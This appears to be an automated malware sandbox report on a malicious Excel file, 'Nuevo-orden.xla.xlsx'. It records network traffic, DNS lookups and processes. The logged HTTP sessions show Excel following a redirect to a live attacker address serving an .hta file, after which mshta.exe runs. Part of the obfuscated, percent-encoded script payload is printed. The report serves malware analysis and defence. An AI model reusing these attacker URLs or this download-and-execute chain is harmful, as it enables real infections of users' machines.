                          Stream Path:_VBA_PROJECT_CUR/VBA/dir
                          CLSID:
                          File Type:data
                          Stream Size:553
                          Entropy:6.360654450583106
                          Base64 Encoded:True
                          Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . ` i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                          Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 04 60 93 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 9, 2025 18:34:24.107227087 CET5442453192.168.2.71.1.1.1
                          Jan 9, 2025 18:34:24.114074945 CET53544241.1.1.1192.168.2.7
                          Jan 9, 2025 18:34:24.114145994 CET5442453192.168.2.71.1.1.1
                          Jan 9, 2025 18:34:24.119618893 CET53544241.1.1.1192.168.2.7
                          Jan 9, 2025 18:34:24.674736977 CET5442453192.168.2.71.1.1.1
                          Jan 9, 2025 18:34:24.679842949 CET53544241.1.1.1192.168.2.7
                          Jan 9, 2025 18:34:24.679986954 CET5442453192.168.2.71.1.1.1
                          Jan 9, 2025 18:35:02.867000103 CET54646443192.168.2.714.103.79.10
                          Jan 9, 2025 18:35:02.867043018 CET4435464614.103.79.10192.168.2.7
                          Jan 9, 2025 18:35:02.867115974 CET54646443192.168.2.714.103.79.10
                          Jan 9, 2025 18:35:02.867368937 CET54646443192.168.2.714.103.79.10
                          Jan 9, 2025 18:35:02.867382050 CET4435464614.103.79.10192.168.2.7
                          Jan 9, 2025 18:35:03.816581964 CET4435464614.103.79.10192.168.2.7
                          Jan 9, 2025 18:35:03.816648960 CET54646443192.168.2.714.103.79.10
                          Jan 9, 2025 18:35:03.821043968 CET54646443192.168.2.714.103.79.10
                          Jan 9, 2025 18:35:03.821063042 CET4435464614.103.79.10192.168.2.7
                          Jan 9, 2025 18:35:03.821381092 CET4435464614.103.79.10192.168.2.7
                          Jan 9, 2025 18:35:03.821436882 CET54646443192.168.2.714.103.79.10
                          Jan 9, 2025 18:35:03.822130919 CET54646443192.168.2.714.103.79.10
                          Jan 9, 2025 18:35:03.863342047 CET4435464614.103.79.10192.168.2.7
                          Jan 9, 2025 18:35:04.372437954 CET4435464614.103.79.10192.168.2.7
                          Jan 9, 2025 18:35:04.372586012 CET54646443192.168.2.714.103.79.10
                          Jan 9, 2025 18:35:04.372600079 CET4435464614.103.79.10192.168.2.7
                          Jan 9, 2025 18:35:04.372631073 CET4435464614.103.79.10192.168.2.7
                          Jan 9, 2025 18:35:04.372646093 CET54646443192.168.2.714.103.79.10
                          Jan 9, 2025 18:35:04.372684002 CET54646443192.168.2.714.103.79.10
                          Jan 9, 2025 18:35:04.376182079 CET54646443192.168.2.714.103.79.10
                          Jan 9, 2025 18:35:04.376194954 CET4435464614.103.79.10192.168.2.7
                          Jan 9, 2025 18:35:04.378349066 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.383229017 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.383301973 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.383402109 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.388216972 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.873832941 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.873887062 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.873902082 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.873913050 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.873925924 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.873938084 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.873949051 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.873959064 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.873967886 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.873980045 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.874037027 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.874037981 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.874037981 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.874037981 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.878964901 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.879062891 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.879112005 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.879156113 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.879194975 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.879208088 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.879218102 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.879266024 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.965419054 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.965461016 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.965514898 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.965548992 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.965584040 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.965616941 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.965617895 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.965617895 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.965617895 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.965713024 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.965728045 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.965763092 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.965795994 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.965823889 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.965847015 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.965879917 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.965898991 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.965914011 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.965934992 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.965969086 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.966479063 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.966531038 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.966548920 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.966564894 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.966592073 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.966623068 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.966636896 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.966715097 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.966763973 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.967334032 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.967390060 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.967394114 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.967422962 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.967442989 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.967483044 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.967483044 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.967516899 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.967566013 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.968159914 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.968195915 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.968229055 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.968230963 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.968250990 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.968288898 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:04.968334913 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.968364000 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:04.968419075 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:05.056873083 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:05.056900978 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:05.056914091 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:05.056993008 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:05.057022095 CET8054647192.3.27.144192.168.2.7
                          Jan 9, 2025 18:35:05.057131052 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:05.057132006 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:05.057132006 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:05.096707106 CET5464780192.168.2.7192.3.27.144
                          Jan 9, 2025 18:35:05.096793890 CET5464780192.168.2.7192.3.27.144
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 9, 2025 18:34:24.106873035 CET53523211.1.1.1192.168.2.7
                          Jan 9, 2025 18:35:02.698532104 CET6358553192.168.2.71.1.1.1
                          Jan 9, 2025 18:35:02.864391088 CET53635851.1.1.1192.168.2.7
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jan 9, 2025 18:35:02.698532104 CET192.168.2.71.1.1.10xbeeaStandard query (0)s.deemos.comA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jan 9, 2025 18:34:12.538211107 CET1.1.1.1192.168.2.70xc1d3No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                          Jan 9, 2025 18:34:12.538211107 CET1.1.1.1192.168.2.70xc1d3No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                          Jan 9, 2025 18:34:12.538211107 CET1.1.1.1192.168.2.70xc1d3No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                          Jan 9, 2025 18:34:15.690572977 CET1.1.1.1192.168.2.70x762fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                          Jan 9, 2025 18:34:15.690572977 CET1.1.1.1192.168.2.70x762fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                          Jan 9, 2025 18:35:02.864391088 CET1.1.1.1192.168.2.70xbeeaNo error (0)s.deemos.com14.103.79.10A (IP address)IN (0x0001)false
                          Jan 9, 2025 18:35:19.080516100 CET1.1.1.1192.168.2.70xd7d5No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                          Jan 9, 2025 18:35:19.080516100 CET1.1.1.1192.168.2.70xd7d5No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                          • s.deemos.com
                          • 192.3.27.144
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.754647192.3.27.144801476C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          TimestampBytes transferredDirectionData
                          Jan 9, 2025 18:35:04.383402109 CET252OUTGET /xampp/mpa/seemebestthingsevermeetgivenbestthingsfornewways.hta HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                          Connection: Keep-Alive
                          Host: 192.3.27.144
                          Jan 9, 2025 18:35:04.873832941 CET1236INHTTP/1.1 200 OK
                          Date: Thu, 09 Jan 2025 17:35:04 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                          Last-Modified: Thu, 09 Jan 2025 12:48:22 GMT
                          ETag: "bb67-62b4564aedd37"
                          Accept-Ranges: bytes
                          Content-Length: 47975
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: application/hta
                          Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 64 20 3d 20 75 6e 65 73 63 61 70 65 28 22 25 36 31 25 36 31 25 36 34 25 33 34 25 33 35 25 33 30 25 36 32 25 33 36 25 36 32 25 33 39 25 36 36 25 36 34 25 33 39 25 33 31 25 33 35 25 33 36 25 32 30 25 36 34 25 32 38 25 33 33 25 32 37 25 33 38 25 33 64 25 33 34 25 32 39 25 36 33 25 34 63 25 35 38 25 35 31 25 35 30 25 32 32 25 30 61 25 32 30 25 35 31 25 34 39 25 35 38 25 34 35 25 36 33 25 34 63 25 35 38 25 35 38 25 35 34 25 37 30 25 34 39 25 35 35 25 35 39 25 34 64 25 35 61 25 32 31 25 36 35 25 33 63 25 37 30 25 33 39 25 32 35 25 37 30 25 32 37 25 35 33 25 35 31 25 35 34 25 34 35 25 35 38 25 34 64 25 34 36 25 35 30 25 34 39 25 36 35 25 36 33 25 34 37 25 35 33 25 35 32 25 35 38 25 34 39 25 35 32 25 35 38 25 32 31 25 36 35 25 32 64 25 32 39 25 32 31 25 32 39 25 35 31 25 35 39 25 35 30 25 34 35 25 35 38 25 34 39 25 32 64 25 32 39 25 37 62 25 36 35 25 36 33 25 32 32 25 30 61 25 32 30 25 34 63 [TRUNCATED]
                          Data Ascii: <script>...(function() { var d = unescape("%61%61%64%34%35%30%62%36%62%39%66%64%39%31%35%36%20%64%28%33%27%38%3d%34%29%63%4c%58%51%50%22%0a%20%51%49%58%45%63%4c%58%58%54%70%49%55%59%4d%5a%21%65%3c%70%39%25%70%27%53%51%54%45%58%4d%46%50%49%65%63%47%53%52%58%49%52%58%21%65%2d%29%21%29%51%59%50%45%58%49%2d%29%7b%65%63%22%0a%20%4c%58%51%50%22%0a%20%46%53%48%5d%22%0a%20%37%47%36%2d%34%58%63%58%3d%34%49%21%65%38%29%3c%38%72%3a%26%37%27%56%2d%34%58%65%22%0a%48%2d%31%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                          Jan 9, 2025 18:35:04.873887062 CET224INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                          Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63
                          Jan 9, 2025 18:35:04.873902082 CET1236INData Raw: 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 35 64 25 34 64 25 35 62 25 35 31 25 33 37 25 34 65 25 34 64 25 34 35 25 34 35 25 32 35 25 33 39 25 33 33 25 33 61 25 35 37 25 33 38 25 35 64 25 34 61 25 34 65 25 32 38 25 35 34 25 35 36 25
                          Data Ascii: %63%63%63%63%63%63%5d%4d%5b%51%37%4e%4d%45%45%25%39%33%3a%57%38%5d%4a%4e%28%54%56%31%5a%58%5d%5e%3b%32%2c%49%3b%2d%2c%53%3e%34%26%3c%53%50%26%5b%2a%4d%50%4b%29%55%36%55%4f%51%3e%4f%29%4a%28%55%47%29%33%45%53%4b%2a%57%3c%57%5e%4d%58%35%4c%57%2b
                          Jan 9, 2025 18:35:04.873913050 CET1236INData Raw: 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25
                          Data Ascii: %63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63
                          Jan 9, 2025 18:35:04.873925924 CET448INData Raw: 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25
                          Data Ascii: %63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63
                          Jan 9, 2025 18:35:04.873938084 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 37 64 25 36 33 25 36
                          Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%7d%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                          Jan 9, 2025 18:35:04.873949051 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                          Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%5d%4d%5b%51%37%4e%
                          Jan 9, 2025 18:35:04.873959064 CET448INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                          Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%21%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                          Jan 9, 2025 18:35:04.873967886 CET892INData Raw: 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33
                          Data Ascii: 3%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%6
                          Jan 9, 2025 18:35:04.873980045 CET1236INData Raw: 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25
                          Data Ascii: %63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%6b%63%63%63%63%63%63%63%63%63%63%63%63
                          Jan 9, 2025 18:35:04.878964901 CET1236INData Raw: 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25
                          Data Ascii: %63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.75464614.103.79.104431476C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          TimestampBytes transferredDirectionData
                          2025-01-09 17:35:03 UTC255OUTGET /6ruXkfgh?&sherry=strange&octagon=fragile&initiative=rough&corsage HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                          Host: s.deemos.com
                          Connection: Keep-Alive
                          2025-01-09 17:35:04 UTC464INHTTP/1.1 302 Found
                          Date: Thu, 09 Jan 2025 17:35:04 GMT
                          Content-Type: text/plain; charset=utf-8
                          Content-Length: 104
                          Connection: close
                          X-DNS-Prefetch-Control: off
                          X-Frame-Options: SAMEORIGIN
                          Strict-Transport-Security: max-age=15724800; includeSubDomains
                          X-Download-Options: noopen
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          Location: http://192.3.27.144/xampp/mpa/seemebestthingsevermeetgivenbestthingsfornewways.hta
                          Vary: Accept
                          2025-01-09 17:35:04 UTC104INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 37 2e 31 34 34 2f 78 61 6d 70 70 2f 6d 70 61 2f 73 65 65 6d 65 62 65 73 74 74 68 69 6e 67 73 65 76 65 72 6d 65 65 74 67 69 76 65 6e 62 65 73 74 74 68 69 6e 67 73 66 6f 72 6e 65 77 77 61 79 73 2e 68 74 61
                          Data Ascii: Found. Redirecting to http://192.3.27.144/xampp/mpa/seemebestthingsevermeetgivenbestthingsfornewways.hta


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:12:34:09
                          Start date:09/01/2025
                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                          Imagebase:0x8a0000
                          File size:53'161'064 bytes
                          MD5 hash:4A871771235598812032C822E6F68F19
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:5
                          Start time:12:35:05
                          Start date:09/01/2025
                          Path:C:\Windows\SysWOW64\mshta.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                          Imagebase:0xe90000
                          File size:13'312 bytes
                          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:false

                          Target ID:9
                          Start time:12:35:14
                          Start date:09/01/2025
                          Path:C:\Windows\splwow64.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\splwow64.exe 12288
                          Imagebase:0x7ff674db0000
                          File size:163'840 bytes
                          MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:11
                          Start time:12:35:22
                          Start date:09/01/2025
                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Nuevo-orden.xla.xlsx"
                          Imagebase:0x8a0000
                          File size:53'161'064 bytes
                          MD5 hash:4A871771235598812032C822E6F68F19
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Call Graph

                          • Entrypoint
                          • Decryption Function
                          • Executed
                          • Not Executed
                          • Show Help
                          callgraph 1 Error: Graph is empty

                          Module: Sheet1

                          Declaration
                          LineContent
                          1

                          Attribute VB_Name = "Sheet1"

                          2

                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                          3

                          Attribute VB_GlobalNameSpace = False

                          4

                          Attribute VB_Creatable = False

                          5

                          Attribute VB_PredeclaredId = True

                          6

                          Attribute VB_Exposed = True

                          7

                          Attribute VB_TemplateDerived = False

                          8

                          Attribute VB_Customizable = True

                          Module: Sheet2

                          Declaration
                          LineContent
                          1

                          Attribute VB_Name = "Sheet2"

                          2

                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                          3

                          Attribute VB_GlobalNameSpace = False

                          4

                          Attribute VB_Creatable = False

                          5

                          Attribute VB_PredeclaredId = True

                          6

                          Attribute VB_Exposed = True

                          7

                          Attribute VB_TemplateDerived = False

                          8

                          Attribute VB_Customizable = True

                          Module: Sheet3

                          Declaration
                          LineContent
                          1

                          Attribute VB_Name = "Sheet3"

                          2

                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                          3

                          Attribute VB_GlobalNameSpace = False

                          4

                          Attribute VB_Creatable = False

                          5

                          Attribute VB_PredeclaredId = True

                          6

                          Attribute VB_Exposed = True

                          7

                          Attribute VB_TemplateDerived = False

                          8

                          Attribute VB_Customizable = True

                          Module: ThisWorkbook

                          Declaration
                          LineContent
                          1

                          Attribute VB_Name = "ThisWorkbook"

                          2

                          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                          3

                          Attribute VB_GlobalNameSpace = False

                          4

                          Attribute VB_Creatable = False

                          5

                          Attribute VB_PredeclaredId = True

                          6

                          Attribute VB_Exposed = True

                          7

                          Attribute VB_TemplateDerived = False

                          8

                          Attribute VB_Customizable = True

                          Reset < >